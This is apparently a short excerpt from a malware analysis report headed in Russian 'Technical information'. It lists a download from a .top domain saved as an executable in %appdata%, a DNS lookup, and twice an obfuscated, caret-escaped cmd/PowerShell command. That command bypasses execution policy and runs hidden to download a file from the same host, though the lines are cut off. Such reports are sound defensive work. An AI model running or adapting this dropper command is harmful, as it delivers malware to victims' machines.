Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^WE^r^S^hElL.^E^Xe^ -exe^c^utIonp^OLi^cy ^Byp^asS -^n^o^PR^o^fiLe ^-^wInD^OwStYL^e^ ^HId^dEn^ (^NEW-oB^JeC^T ^SY^STEm.N^E^T.^w^ebcl^ieNt).dO^WNlO^a^Df^iLe('http://zonexx...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "P^o^WE^r^S^hElL.^E^Xe^ -exe^c^utIonp^OLi^cy ^Byp^asS -^n^o^PR^o^fiLe ^-^wInD^OwStYL^e^ ^HId^dEn^ (^NEW-oB^JeC^T ^SY^STEm.N^E^T.^w^ebcl^ieNt).dO^WNlO^a^Df^iLe('http://zonexx...' (со скрытым окном)